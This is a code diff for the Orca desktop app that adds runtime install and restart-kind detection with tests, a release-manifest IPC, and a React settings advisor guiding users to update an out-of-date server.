+    const unknown = detectRuntimeInstall(baseInput({ platform: 'linux', linuxPackageOwner: null }))
+    expect(unknown.installKind).toBe('unknown')
+  })
+})
+
+describe('detectRuntimeInstall restart kind', () => {
+  it('maps a system-slice service cgroup to systemd with its unit name', () => {
+    const result = detectRuntimeInstall(
+      baseInput({
+        platform: 'linux',
+        cgroupContent: '0::/system.slice/orca-serve.service\n'
+      })
+    )
+    expect(result.restartKind).toBe('systemd')
+    expect(result.serviceName).toBe('orca-serve.service')
+  })
+
+  it('trusts a user-slice service only when the unit is an orca unit', () => {
+    const result = detectRuntimeInstall(
+      baseInput({
+        platform: 'linux',
+        cgroupContent:
+          '0::/user.slice/user-1000.slice/user@1000.service/app.slice/orca-serve.service\n'
+      })
+    )
+    expect(result.restartKind).toBe('systemd')
+    expect(result.serviceName).toBe('orca-serve.service')
+  })
+
+  it('does NOT map a user-slice terminal service to systemd', () => {
+    const result = detectRuntimeInstall(
+      baseInput({
+        platform: 'linux',
+        isServeMode: true,
+        cgroupContent:
+          '0::/user.slice/user-1000.slice/user@1000.service/app.slice/gnome-terminal-server.service\n'
+      })
+    )
+    expect(result.restartKind).toBe('foreground-serve')
+    expect(result.serviceName).toBeUndefined()
+  })
+
+  it('maps a foreground orca serve with no systemd markers to foreground-serve', () => {
+    const result = detectRuntimeInstall(
+      baseInput({ platform: 'linux', isServeMode: true, cgroupContent: null })
+    )
+    expect(result.restartKind).toBe('foreground-serve')
+  })
+
+  it('maps the full desktop app to desktop', () => {
+    const result = detectRuntimeInstall(
+      baseInput({ platform: 'darwin', isServeMode: false, cgroupContent: null })
+    )
+    expect(result.restartKind).toBe('desktop')
+  })
+
+  it('does not read cgroup off linux', () => {
+    const result = detectRuntimeInstall(
+      baseInput({
+        platform: 'win32',
+        isServeMode: false,
+        cgroupContent: '0::/system.slice/orca-serve.service\n'
+      })
+    )
+    expect(result.restartKind).toBe('desktop')
+    expect(result.serviceName).toBeUndefined()
+  })
+})
+
+describe('detectRuntimeInstall common fields', () => {
+  it('stamps currentVersion and hostArch and leaves latest fields unset', () => {
+    const result = detectRuntimeInstall(baseInput({ appVersion: '4.5.6', arch: 'arm64' }))
+    expect(result.currentVersion).toBe('4.5.6')
+    expect(result.hostArch).toBe('arm64')
+    expect(result.latestVersion).toBeUndefined()
+    expect(result.updateAvailable).toBeUndefined()
+    expect(result.docsUrl).toBeUndefined()
+  })
+})
+
+describe('gatherWindowsInstallRoots', () => {
+  it('derives per-user Programs and machine-wide Program Files roots', () => {
+    const roots = gatherWindowsInstallRoots({
+      LOCALAPPDATA: 'C:\\Users\\me\\AppData\\Local',
+      ProgramFiles: 'C:\\Program Files',
+      'ProgramFiles(x86)': 'C:\\Program Files (x86)'
+    } as NodeJS.ProcessEnv)
+    expect(roots).toContain('C:\\Users\\me\\AppData\\Local\\Programs')
+    expect(roots).toContain('C:\\Program Files')
+    expect(roots).toContain('C:\\Program Files (x86)')
+  })
+
+  it('returns an empty list when no install-root env vars are present', () => {
+    expect(gatherWindowsInstallRoots({} as NodeJS.ProcessEnv)).toEqual([])
+  })
+})

--- a/src/main/runtime/runtime-install-detection.ts
+++ b/src/main/runtime/runtime-install-detection.ts
@@ -1,0 +1,230 @@
+import { execFileSync } from 'node:child_process'
+import { readFileSync } from 'node:fs'
+import { app } from 'electron'
+import type {
+  RuntimeInstallKind,
+  RuntimeRestartKind,
+  RuntimeUpdateInfo
+} from '../../shared/runtime-types'
+
+// Why: everything the mapping needs is captured in one plain snapshot so the
+// core is a pure function testable with fixtures — the caching wrapper is the
+// only place that touches electron/process/fs.
+export type RuntimeInstallDetectionInput = {
+  platform: NodeJS.Platform
+  arch: string
+  isPackaged: boolean
+  execPath: string
+  appVersion: string
+  // process.env.APPIMAGE — set by the AppImage runtime; its value is the install path.
+  appImagePath: string | null
+  // True for `orca serve`; false when serving from the full desktop app.
+  isServeMode: boolean
+  // /proc/self/cgroup contents (linux only); null when unreadable or off-linux.
+  cgroupContent: string | null
+  // Candidate NSIS install roots gathered from Windows env vars.
+  windowsInstallRoots: string[]
+  // Result of a single startup package-ownership probe on packaged non-AppImage
+  // Linux; null when skipped, failed, or inconclusive.
+  linuxPackageOwner: 'linux-deb' | 'linux-rpm' | null
+}
+
+// Why: a manual `orca serve` inherits its parent's cgroup, so a user-slice
+// service unit is only trusted as systemd when it is actually an orca unit.
+const ORCA_SERVICE_PREFIX = 'orca'
+
+export function detectRuntimeInstall(input: RuntimeInstallDetectionInput): RuntimeUpdateInfo {
+  const systemd = detectSystemdService(input)
+  const installKind = detectInstallKind(input)
+  const restartKind = detectRestartKind(input, systemd)
+
+  const updateInfo: RuntimeUpdateInfo = {
+    currentVersion: input.appVersion,
+    installKind,
+    restartKind,
+    hostArch: input.arch
+  }
+  if (installKind === 'linux-appimage' && input.appImagePath) {
+    updateInfo.installPath = input.appImagePath
+  }
+  if (systemd) {
+    updateInfo.serviceName = systemd.serviceName
+  }
+  return updateInfo
+}
+
+function detectInstallKind(input: RuntimeInstallDetectionInput): RuntimeInstallKind {
+  if (!input.isPackaged) {
+    return 'source'
+  }
+  if (input.platform === 'linux' && input.appImagePath) {
+    return 'linux-appimage'
+  }
+  if (input.platform === 'win32') {
+    return isUnderWindowsInstallRoot(input) ? 'windows-installer' : 'unknown'
+  }
+  if (input.platform === 'darwin') {
+    // Why: Homebrew casks also copy into /Applications, so mac-homebrew is not
+    // distinguishable at runtime; report the broader mac-app (its guide covers Homebrew).
+    return isInsideMacAppBundle(input.execPath) ? 'mac-app' : 'unknown'
+  }
+  if (input.platform === 'linux') {
+    // Non-AppImage packaged Linux: only trust deb/rpm from the startup probe.
+    return input.linuxPackageOwner ?? 'unknown'
+  }
+  return 'unknown'
+}
+
+function detectRestartKind(
+  input: RuntimeInstallDetectionInput,
+  systemd: SystemdService | null
+): RuntimeRestartKind {
+  if (systemd) {
+    return 'systemd'
+  }
+  // Serving from the full desktop app restarts by relaunching the app; a
+  // foreground `orca serve` with no systemd markers is stopped and re-run by hand.
+  return input.isServeMode ? 'foreground-serve' : 'desktop'
+}
+
+type SystemdService = { serviceName: string }
+
+function detectSystemdService(input: RuntimeInstallDetectionInput): SystemdService | null {
+  if (input.platform !== 'linux' || !input.cgroupContent) {
+    return null
+  }
+  for (const line of input.cgroupContent.split('\n')) {
+    const service = matchSystemdServiceLine(line)
+    if (service) {
+      return service
+    }
+  }
+  return null
+}
+
+function matchSystemdServiceLine(line: string): SystemdService | null {
+  const trimmed = line.trim()
+  if (trimmed === '') {
+    return null
+  }
+  // cgroup lines are `hierarchy:controllers:/path`; the path is the final field.
+  const path = trimmed.slice(trimmed.lastIndexOf(':') + 1)
+  const segments = path.split('/').filter((segment) => segment !== '')
+  // The leaf `.service` is this process's unit; ancestors like user@1000.service
+  // are session managers, not the served unit.
+  let leafService: string | null = null
+  for (const segment of segments) {
+    if (segment.endsWith('.service')) {
+      leafService = segment
+    }
+  }
+  if (!leafService) {
+    return null
+  }
+  if (segments.includes('system.slice')) {
+    return { serviceName: leafService }
+  }
+  // A user-slice unit is only trusted when it is itself an orca unit; a manual
+  // `orca serve` inside gnome-terminal-server.service must not map to systemd.
+  if (segments.includes('user.slice') && leafService.startsWith(ORCA_SERVICE_PREFIX)) {
+    return { serviceName: leafService }
+  }
+  return null
+}
+
+function isUnderWindowsInstallRoot(input: RuntimeInstallDetectionInput): boolean {
+  const execPath = normalizeWindowsPath(input.execPath)
+  return input.windowsInstallRoots.some((root) => {
+    const normalizedRoot = normalizeWindowsPath(root)
+    return normalizedRoot !== '' && execPath.startsWith(`${normalizedRoot}\\`)
+  })
+}
+
+function normalizeWindowsPath(value: string): string {
+  // Windows paths are case-insensitive and mix separators; normalize both.
+  return value.replace(/\//g, '\\').toLowerCase()
+}
+
+function isInsideMacAppBundle(execPath: string): boolean {
+  return /\.app\/Contents\/MacOS\//.test(execPath)
+}
+
+// Why: NSIS installs per-user under %LOCALAPPDATA%\Programs and machine-wide
+// under Program Files; execPath sitting below one of these is the installer signal.
+export function gatherWindowsInstallRoots(env: NodeJS.ProcessEnv): string[] {
+  const roots: string[] = []
+  if (env.LOCALAPPDATA) {
+    roots.push(`${env.LOCALAPPDATA}\\Programs`)
+  }
+  for (const key of ['ProgramFiles', 'ProgramFiles(x86)', 'ProgramW6432']) {
+    const value = env[key]
+    if (value) {
+      roots.push(value)
+    }
+  }
+  return roots
+}
+
+function readCgroupContent(platform: NodeJS.Platform): string | null {
+  if (platform !== 'linux') {
+    return null
+  }
+  try {
+    return readFileSync('/proc/self/cgroup', 'utf-8')
+  } catch {
+    return null
+  }
+}
+
+// Why: single best-effort startup probe for the deb-vs-rpm split; any failure
+// (tool absent, not owned, timeout) yields null so detection reports `unknown`.
+function probeLinuxPackageOwner(
+  input: Pick<RuntimeInstallDetectionInput, 'platform' | 'isPackaged' | 'execPath' | 'appImagePath'>
+): 'linux-deb' | 'linux-rpm' | null {
+  if (input.platform !== 'linux' || !input.isPackaged || input.appImagePath) {
+    return null
+  }
+  if (tryPackageProbe('dpkg', ['-S', input.execPath])) {
+    return 'linux-deb'
+  }
+  if (tryPackageProbe('rpm', ['-qf', input.execPath])) {
+    return 'linux-rpm'
+  }
+  return null
+}
+
+function tryPackageProbe(command: string, args: string[]): boolean {
+  try {
+    execFileSync(command, args, { stdio: 'ignore', timeout: 2000 })
+    return true
+  } catch {
+    return false
+  }
+}
+
+let cachedUpdateInfo: RuntimeUpdateInfo | undefined
+
+// Gathers real values once and caches the result. Never runs a subprocess or
+// reads /proc on the status hot path — status.get reuses the cached snapshot.
+export function getRuntimeUpdateInfo(): RuntimeUpdateInfo {
+  if (cachedUpdateInfo) {
+    return cachedUpdateInfo
+  }
+  const platform = process.platform
+  const isPackaged = app.isPackaged
+  const execPath = process.execPath
+  const appImagePath = process.env.APPIMAGE ?? null
+  cachedUpdateInfo = detectRuntimeInstall({
+    platform,
+    arch: process.arch,
+    isPackaged,
+    execPath,
+    appVersion: app.getVersion(),
+    appImagePath,
+    isServeMode: process.argv.includes('--serve'),
+    cgroupContent: readCgroupContent(platform),
+    windowsInstallRoots: platform === 'win32' ? gatherWindowsInstallRoots(process.env) : [],
+    linuxPackageOwner: probeLinuxPackageOwner({ platform, isPackaged, execPath, appImagePath })
+  })
+  return cachedUpdateInfo
+}

--- a/src/preload/api-types.ts
+++ b/src/preload/api-types.ts
@@ -1457,6 +1457,12 @@ export type PreloadApi = {
       githubEmail: string | null
     }) => Promise<{ ok: true } | { ok: false; status: number | null; error: string }>
   }
+  runtimeReleaseManifest: {
+    fetch: (args: {
+      platform?: string
+      arch?: 'x64' | 'arm64'
+    }) => Promise<{ ok: true; yaml: string } | { ok: false }>
+  }
   crashReports: {
     getLatestPending: () => Promise<CrashReportRecord | null>
     getLatestReport: () => Promise<CrashReportRecord | null>

--- a/src/preload/index.ts
+++ b/src/preload/index.ts
@@ -1107,6 +1107,14 @@ const api = {
       ipcRenderer.invoke('feedback:submit', args)
   },
 
+  runtimeReleaseManifest: {
+    fetch: (args: {
+      platform?: string
+      arch?: 'x64' | 'arm64'
+    }): Promise<{ ok: true; yaml: string } | { ok: false }> =>
+      ipcRenderer.invoke('runtimeReleaseManifest:fetch', args)
+  },
+
   crashReports: {
     getLatestPending: () => ipcRenderer.invoke('crashReports:getLatestPending'),
     getLatestReport: () => ipcRenderer.invoke('crashReports:getLatestReport'),

--- a/src/renderer/src/components/settings/RuntimeEnvironmentsPane.tsx
+++ b/src/renderer/src/components/settings/RuntimeEnvironmentsPane.tsx
@@ -53,6 +53,8 @@ import {
   getWebRuntimeEnvironmentsSearchEntry
 } from './runtime-environments-search'
 import { unwrapRuntimeRpcResult } from '@/runtime/runtime-rpc-client'
+import { RuntimeUpdateAdvisor, type RuntimeUpdateRecheckState } from './RuntimeUpdateAdvisor'
+import { parseEndpointPortHint } from './runtime-update-advisor-model'
 import { useAppStore } from '@/store'
 import { translate } from '@/i18n/i18n'
 import { cn } from '@/lib/utils'
@@ -259,6 +261,9 @@ export function RuntimeEnvironmentsPane({
   const [switchingValue, setSwitchingValue] = useState<string | null>(null)
   const [removingId, setRemovingId] = useState<string | null>(null)
   const [disconnectingId, setDisconnectingId] = useState<string | null>(null)
+  const [recheckStateById, setRecheckStateById] = useState<
+    Record<string, RuntimeUpdateRecheckState>
+  >({})
   const [pendingSwitchValue, setPendingSwitchValue] = useState<string | null>(null)
   const [pendingRemove, setPendingRemove] = useState<PublicKnownRuntimeEnvironment | null>(null)
   const [addServerFormOpen, setAddServerFormOpen] = useState(false)
@@ -675,6 +680,56 @@ export function RuntimeEnvironmentsPane({
     }
   }
 
+  // "Check again" from the update advisor: re-read status through the raw,
+  // non-asserting RPC (unwrap only, never assertRuntimeStatusCompatible) so
+  // detection/versions keep rendering, then re-evaluate compatibility. On an ok
+  // verdict the blocked row clears back to the normal view; on continued
+  // incompatibility the advisor shows an inline "still out of date" note.
+  const recheckEnvironment = async (environment: PublicKnownRuntimeEnvironment): Promise<void> => {
+    setRecheckStateById((current) => ({ ...current, [environment.id]: 'checking' }))
+    try {
+      const response = await window.api.runtimeEnvironments.getStatus({
+        selector: environment.id,
+        timeoutMs: 15_000
+      })
+      const runtimeStatus = unwrapRuntimeRpcResult<RuntimeStatus>(response)
+      const compatibility = evaluateHostDetails(runtimeStatus)
+      useAppStore.getState().setRuntimeEnvironmentStatus(environment.id, {
+        status: runtimeStatus,
+        checkedAt: Date.now()
+      })
+      if (!mountedRef.current) {
+        return
+      }
+      setDetailsByEnvironmentId((current) => ({
+        ...current,
+        [environment.id]: { status: 'ready', runtimeStatus, compatibility, error: null }
+      }))
+      setRecheckStateById((current) => ({
+        ...current,
+        [environment.id]: compatibility.kind === 'blocked' ? 'still-blocked' : 'idle'
+      }))
+    } catch (error) {
+      useAppStore.getState().setRuntimeEnvironmentStatus(environment.id, {
+        status: null,
+        checkedAt: Date.now()
+      })
+      if (!mountedRef.current) {
+        return
+      }
+      setDetailsByEnvironmentId((current) => ({
+        ...current,
+        [environment.id]: {
+          status: 'error',
+          runtimeStatus: null,
+          compatibility: null,
+          error: error instanceof Error ? error.message : String(error)
+        }
+      }))
+      setRecheckStateById((current) => ({ ...current, [environment.id]: 'idle' }))
+    }
+  }
+
   const switchToValue = async (value: string): Promise<boolean> => {
     if (value === NO_RUNTIME_VALUE) {
       return false
@@ -866,7 +921,7 @@ export function RuntimeEnvironmentsPane({
                 <div
                   key={environment.id}
                   data-settings-section={environment.id}
-                  className="flex items-center gap-3 px-4 py-3"
+                  className="px-4 py-3"
                 >
                   {(() => {
                     const details = detailsByEnvironmentId[environment.id]
@@ -875,6 +930,8 @@ export function RuntimeEnvironmentsPane({
                     const connectionState = getRuntimeServerConnectionState(details)
                     // A connected host exposes Disconnect; otherwise Connect.
                     const isReachable = connectionState === 'connected'
+                    const blockedVerdict =
+                      details?.compatibility?.kind === 'blocked' ? details.compatibility : null
                     const actionBusy =
                       connectingId === environment.id ||
                       switchingValue === environment.id ||
@@ -882,109 +939,119 @@ export function RuntimeEnvironmentsPane({
                       removingId === environment.id
                     return (
                       <>
-                        <Server className="size-4 shrink-0 text-muted-foreground" />
-                        <div className="min-w-0 flex-1">
-                          <div className="flex min-w-0 items-center gap-2">
-                            <div className="truncate text-sm font-medium">{environment.name}</div>
-                            <span
-                              className={cn(
-                                'size-2 shrink-0 rounded-full',
-                                getRuntimeServerDotClass(connectionState)
-                              )}
-                            />
-                            <span className="text-[11px] text-muted-foreground">
-                              {getRuntimeServerConnectionLabel(connectionState)}
-                            </span>
-                            {details?.compatibility?.kind === 'blocked' ? (
-                              <AlertTriangle className="size-3.5 shrink-0 text-destructive" />
-                            ) : details?.status === 'loading' ? (
-                              <Loader2 className="size-3.5 shrink-0 animate-spin text-muted-foreground" />
+                        <div className="flex items-center gap-3">
+                          <Server className="size-4 shrink-0 text-muted-foreground" />
+                          <div className="min-w-0 flex-1">
+                            <div className="flex min-w-0 items-center gap-2">
+                              <div className="truncate text-sm font-medium">{environment.name}</div>
+                              <span
+                                className={cn(
+                                  'size-2 shrink-0 rounded-full',
+                                  getRuntimeServerDotClass(connectionState)
+                                )}
+                              />
+                              <span className="text-[11px] text-muted-foreground">
+                                {getRuntimeServerConnectionLabel(connectionState)}
+                              </span>
+                              {details?.compatibility?.kind === 'blocked' ? (
+                                <AlertTriangle className="size-3.5 shrink-0 text-destructive" />
+                              ) : details?.status === 'loading' ? (
+                                <Loader2 className="size-3.5 shrink-0 animate-spin text-muted-foreground" />
+                              ) : null}
+                            </div>
+                            <p className="truncate text-xs text-muted-foreground">
+                              {isActive
+                                ? translate(
+                                    'auto.components.settings.RuntimeEnvironmentsPane.activeServerRowHelp',
+                                    'Active server for server-routed projects, terminals, and provider checks.'
+                                  )
+                                : getHostDetailsSummary(details)}
+                            </p>
+                            {/* Blocked hosts render the full advisor below the row,
+                              so the truncated line is kept only for error states. */}
+                            {detailsDescription && !blockedVerdict ? (
+                              <p className="mt-0.5 truncate text-xs text-muted-foreground">
+                                {detailsDescription}
+                              </p>
                             ) : null}
                           </div>
-                          <p className="truncate text-xs text-muted-foreground">
-                            {isActive
-                              ? translate(
-                                  'auto.components.settings.RuntimeEnvironmentsPane.activeServerRowHelp',
-                                  'Active server for server-routed projects, terminals, and provider checks.'
-                                )
-                              : getHostDetailsSummary(details)}
-                          </p>
-                          {detailsDescription ? (
-                            <p
-                              className={cn(
-                                'mt-0.5 truncate text-xs',
-                                details?.compatibility?.kind === 'blocked'
-                                  ? 'text-destructive'
-                                  : 'text-muted-foreground'
-                              )}
-                            >
-                              {detailsDescription}
-                            </p>
-                          ) : null}
-                        </div>
-                        <div className="flex shrink-0 items-center gap-1">
-                          {isReachable ? (
-                            <Button
-                              type="button"
-                              variant="ghost"
-                              size="xs"
-                              className="gap-1.5"
-                              onClick={() => void disconnectEnvironment(environment)}
-                              disabled={actionBusy}
-                            >
-                              {disconnectingId === environment.id ? (
-                                <Loader2 className="size-3 animate-spin" />
-                              ) : (
-                                <ServerOff className="size-3" />
-                              )}
-                              {translate(
-                                'auto.components.settings.RuntimeEnvironmentsPane.disconnect',
-                                'Disconnect'
-                              )}
-                            </Button>
-                          ) : (
-                            <Button
-                              type="button"
-                              variant="ghost"
-                              size="xs"
-                              className="gap-1.5"
-                              onClick={() => void connectEnvironment(environment)}
-                              disabled={actionBusy || connectionState === 'checking'}
-                            >
-                              {connectingId === environment.id ? (
-                                <Loader2 className="size-3 animate-spin" />
-                              ) : (
-                                <Server className="size-3" />
-                              )}
-                              {translate(
-                                'auto.components.settings.RuntimeEnvironmentsPane.connect',
-                                'Connect'
-                              )}
-                            </Button>
-                          )}
-                          <Button
-                            type="button"
-                            variant="ghost"
-                            size="icon"
-                            onClick={() => {
-                              setRemoveError(null)
-                              setPendingRemove(environment)
-                            }}
-                            className="size-7 text-muted-foreground hover:text-red-400"
-                            disabled={isBusy}
-                            aria-label={translate(
-                              'auto.components.settings.RuntimeEnvironmentsPane.aeb26635d2',
-                              'Remove {{value0}}',
-                              { value0: environment.name }
-                            )}
-                          >
-                            {removingId === environment.id ? (
-                              <Loader2 className="size-3 animate-spin" />
+                          <div className="flex shrink-0 items-center gap-1">
+                            {isReachable ? (
+                              <Button
+                                type="button"
+                                variant="ghost"
+                                size="xs"
+                                className="gap-1.5"
+                                onClick={() => void disconnectEnvironment(environment)}
+                                disabled={actionBusy}
+                              >
+                                {disconnectingId === environment.id ? (
+                                  <Loader2 className="size-3 animate-spin" />
+                                ) : (
+                                  <ServerOff className="size-3" />
+                                )}
+                                {translate(
+                                  'auto.components.settings.RuntimeEnvironmentsPane.disconnect',
+                                  'Disconnect'
+                                )}
+                              </Button>
                             ) : (
-                              <Trash2 className="size-3" />
+                              <Button
+                                type="button"
+                                variant="ghost"
+                                size="xs"
+                                className="gap-1.5"
+                                onClick={() => void connectEnvironment(environment)}
+                                disabled={actionBusy || connectionState === 'checking'}
+                              >
+                                {connectingId === environment.id ? (
+                                  <Loader2 className="size-3 animate-spin" />
+                                ) : (
+                                  <Server className="size-3" />
+                                )}
+                                {translate(
+                                  'auto.components.settings.RuntimeEnvironmentsPane.connect',
+                                  'Connect'
+                                )}
+                              </Button>
                             )}
-                          </Button>
+                            <Button
+                              type="button"
+                              variant="ghost"
+                              size="icon"
+                              onClick={() => {
+                                setRemoveError(null)
+                                setPendingRemove(environment)
+                              }}
+                              className="size-7 text-muted-foreground hover:text-red-400"
+                              disabled={isBusy}
+                              aria-label={translate(
+                                'auto.components.settings.RuntimeEnvironmentsPane.aeb26635d2',
+                                'Remove {{value0}}',
+                                { value0: environment.name }
+                              )}
+                            >
+                              {removingId === environment.id ? (
+                                <Loader2 className="size-3 animate-spin" />
+                              ) : (
+                                <Trash2 className="size-3" />
+                              )}
+                            </Button>
+                          </div>
                         </div>
+                        {blockedVerdict && details?.runtimeStatus ? (
+                          <RuntimeUpdateAdvisor
+                            verdict={blockedVerdict}
+                            status={details.runtimeStatus}
+                            portHint={parseEndpointPortHint(
+                              environment.endpoints.find(
+                                (candidate) => candidate.id === environment.preferredEndpointId
+                              )?.endpoint ?? environment.endpoints[0]?.endpoint
+                            )}
+                            recheckState={recheckStateById[environment.id] ?? 'idle'}
+                            onRecheck={() => void recheckEnvironment(environment)}
+                          />
+                        ) : null}
                       </>
                     )
                   })()}

--- a/src/renderer/src/components/settings/RuntimeUpdateAdvisor.tsx
+++ b/src/renderer/src/components/settings/RuntimeUpdateAdvisor.tsx
@@ -10,6 +10,7 @@ import { NativeChatCopyButton } from '../native-chat/NativeChatCopyButton'
 import { Button } from '../ui/button'
 import { translate } from '@/i18n/i18n'
 import { buildRuntimeUpdateAdvisorGuide } from './runtime-update-advisor-model'
+import { useRuntimeReleaseMetadata } from './use-runtime-release-metadata'
 
 /** 'checking' disables the button and shows a spinner; 'still-blocked' means the
  *  last recheck came back incompatible, so an inline note confirms the click had
@@ -31,7 +32,10 @@ export function RuntimeUpdateAdvisor({
   recheckState,
   onRecheck
 }: RuntimeUpdateAdvisorProps): React.JSX.Element | null {
-  const guide = buildRuntimeUpdateAdvisorGuide({ verdict, status, portHint })
+  // Lazily fetched only for a shown server-too-old block; pending/failed → the
+  // guide renders version-less. Manifest values win over server-supplied hints.
+  const releaseMetadata = useRuntimeReleaseMetadata(verdict, status)
+  const guide = buildRuntimeUpdateAdvisorGuide({ verdict, status, portHint, releaseMetadata })
   if (!guide) {
     return null
   }

--- a/src/renderer/src/components/settings/RuntimeUpdateAdvisor.tsx
+++ b/src/renderer/src/components/settings/RuntimeUpdateAdvisor.tsx
@@ -1,0 +1,227 @@
+import { AlertTriangle, Download, ExternalLink, Loader2, RefreshCw } from 'lucide-react'
+import type { RuntimeCompatVerdict } from '../../../../shared/protocol-compat'
+import type { RuntimeStatus } from '../../../../shared/runtime-types'
+import type {
+  RuntimeUpdateGuide,
+  RuntimeUpdateGuideLink,
+  RuntimeUpdateGuideStep
+} from '../../../../shared/runtime-update-guide'
+import { NativeChatCopyButton } from '../native-chat/NativeChatCopyButton'
+import { Button } from '../ui/button'
+import { translate } from '@/i18n/i18n'
+import { buildRuntimeUpdateAdvisorGuide } from './runtime-update-advisor-model'
+
+/** 'checking' disables the button and shows a spinner; 'still-blocked' means the
+ *  last recheck came back incompatible, so an inline note confirms the click had
+ *  an effect even though the environment stays blocked. */
+export type RuntimeUpdateRecheckState = 'idle' | 'checking' | 'still-blocked'
+
+type RuntimeUpdateAdvisorProps = {
+  verdict: RuntimeCompatVerdict
+  status: RuntimeStatus
+  portHint?: number
+  recheckState: RuntimeUpdateRecheckState
+  onRecheck: () => void
+}
+
+export function RuntimeUpdateAdvisor({
+  verdict,
+  status,
+  portHint,
+  recheckState,
+  onRecheck
+}: RuntimeUpdateAdvisorProps): React.JSX.Element | null {
+  const guide = buildRuntimeUpdateAdvisorGuide({ verdict, status, portHint })
+  if (!guide) {
+    return null
+  }
+  return (
+    <div className="mt-2 space-y-3 rounded-lg border border-border/60 bg-muted/20 p-3">
+      <div className="flex items-start gap-2">
+        <AlertTriangle className="mt-0.5 size-4 shrink-0 text-destructive" />
+        <div className="min-w-0 space-y-1">
+          <h4 className="text-sm font-semibold">{guide.title}</h4>
+          <p className="text-xs leading-relaxed text-muted-foreground">
+            {guide.direction === 'client-too-old' ? guide.message : guide.primary}
+          </p>
+        </div>
+      </div>
+      {guide.direction === 'client-too-old' ? (
+        <ClientUpdateAction />
+      ) : (
+        <ServerUpdateGuide guide={guide} />
+      )}
+      <RecheckRow recheckState={recheckState} onRecheck={onRecheck} />
+    </div>
+  )
+}
+
+// ── client-too-old: local updater only, never server commands ──────────
+
+function ClientUpdateAction(): React.JSX.Element {
+  // Why: the desktop updater surfaces its own progress/result via the global
+  // UpdateCard, so triggering a check here is the whole action. Guarded because
+  // web/mobile builds may not expose the updater — those get the release link.
+  const canCheckForUpdates = typeof window.api.updater?.check === 'function'
+  return (
+    <div className="flex flex-wrap items-center gap-2">
+      {canCheckForUpdates ? (
+        <Button
+          type="button"
+          variant="default"
+          size="xs"
+          className="gap-1.5"
+          onClick={() => void window.api.updater.check({ includePrerelease: false })}
+        >
+          <Download className="size-3" />
+          {translate(
+            'auto.components.settings.RuntimeUpdateAdvisor.checkForUpdates',
+            'Check for updates'
+          )}
+        </Button>
+      ) : null}
+      <AdvisorLink
+        link={{
+          label: translate(
+            'auto.components.settings.RuntimeUpdateAdvisor.downloadOrca',
+            'Download the latest Orca'
+          ),
+          url: 'https://github.com/stablyai/orca/releases'
+        }}
+      />
+    </div>
+  )
+}
+
+// ── server-too-old: versions, detection, copyable steps, links ─────────
+
+function ServerUpdateGuide({
+  guide
+}: {
+  guide: Extract<RuntimeUpdateGuide, { direction: 'server-too-old' }>
+}): React.JSX.Element {
+  return (
+    <div className="space-y-3">
+      <ServerUpdateMeta guide={guide} />
+      {guide.steps.length > 0 ? (
+        <ol className="space-y-2">
+          {guide.steps.map((step, index) => (
+            <li key={index}>
+              <AdvisorStep step={step} />
+            </li>
+          ))}
+        </ol>
+      ) : null}
+      {guide.links.length > 0 ? (
+        <div className="flex flex-wrap items-center gap-x-4 gap-y-1">
+          {guide.links.map((link) => (
+            <AdvisorLink key={link.url} link={link} />
+          ))}
+        </div>
+      ) : null}
+    </div>
+  )
+}
+
+function ServerUpdateMeta({
+  guide
+}: {
+  guide: Extract<RuntimeUpdateGuide, { direction: 'server-too-old' }>
+}): React.JSX.Element {
+  const protocolLine = translate(
+    'auto.components.settings.RuntimeUpdateAdvisor.protocolLine',
+    'Server protocol {{value0}}, this client requires {{value1}}.',
+    {
+      value0: guide.protocol.running,
+      value1: guide.protocol.required ?? '—'
+    }
+  )
+  return (
+    <div className="space-y-0.5 text-xs text-muted-foreground">
+      <p>{protocolLine}</p>
+      {guide.detectedLine ? <p>{guide.detectedLine}</p> : null}
+      {guide.serverVersion ? (
+        <p>
+          {translate(
+            'auto.components.settings.RuntimeUpdateAdvisor.serverVersion',
+            'Server version {{value0}}.',
+            { value0: guide.serverVersion }
+          )}
+        </p>
+      ) : null}
+      {guide.latestVersion ? (
+        <p>
+          {translate(
+            'auto.components.settings.RuntimeUpdateAdvisor.latestVersion',
+            'Latest version {{value0}}.',
+            { value0: guide.latestVersion }
+          )}
+        </p>
+      ) : null}
+    </div>
+  )
+}
+
+function AdvisorStep({ step }: { step: RuntimeUpdateGuideStep }): React.JSX.Element {
+  if (step.kind === 'prose') {
+    return <p className="text-xs leading-relaxed text-muted-foreground">{step.text}</p>
+  }
+  // A command block is a suggestion for the user to run on the server (typically
+  // over their own SSH session) — never a command Orca executes.
+  return (
+    <div className="relative rounded-md border border-border/60 bg-muted/40">
+      <pre className="scrollbar-sleek overflow-x-auto whitespace-pre px-3 py-2 pr-9 font-mono text-xs leading-relaxed text-foreground">
+        {step.text}
+      </pre>
+      <NativeChatCopyButton text={step.text} className="absolute right-1 top-1" />
+    </div>
+  )
+}
+
+function AdvisorLink({ link }: { link: RuntimeUpdateGuideLink }): React.JSX.Element {
+  return (
+    <Button
+      type="button"
+      variant="link"
+      size="xs"
+      className="h-auto gap-1 px-0"
+      onClick={() => void window.api.shell.openUrl(link.url)}
+    >
+      <ExternalLink className="size-3" />
+      {link.label}
+    </Button>
+  )
+}
+
+function RecheckRow({
+  recheckState,
+  onRecheck
+}: {
+  recheckState: RuntimeUpdateRecheckState
+  onRecheck: () => void
+}): React.JSX.Element {
+  const checking = recheckState === 'checking'
+  return (
+    <div className="flex flex-wrap items-center gap-2 border-t border-border/50 pt-2">
+      <Button
+        type="button"
+        variant="outline"
+        size="xs"
+        className="gap-1.5"
+        onClick={onRecheck}
+        disabled={checking}
+      >
+        {checking ? <Loader2 className="size-3 animate-spin" /> : <RefreshCw className="size-3" />}
+        {translate('auto.components.settings.RuntimeUpdateAdvisor.checkAgain', 'Check again')}
+      </Button>
+      {recheckState === 'still-blocked' ? (
+        <span className="text-xs text-muted-foreground">
+          {translate(
+            'auto.components.settings.RuntimeUpdateAdvisor.stillOutOfDate',
+            'Still out of date. Update the server, then check again.'
+          )}
+        </span>
+      ) : null}
+    </div>
+  )
+}

--- a/src/renderer/src/components/settings/runtime-update-advisor-model.test.ts
+++ b/src/renderer/src/components/settings/runtime-update-advisor-model.test.ts
@@ -1,0 +1,134 @@
+import { describe, expect, it } from 'vitest'
+import {
+  buildRuntimeUpdateAdvisorGuide,
+  deriveRuntimeUpdateGuideInput,
+  parseEndpointPortHint
+} from './runtime-update-advisor-model'
+import {
+  describeRuntimeCompatBlock,
+  type RuntimeCompatVerdict
+} from '../../../../shared/protocol-compat'
+import { DEFAULT_SERVICE_NAME } from '../../../../shared/runtime-update-info-validation'
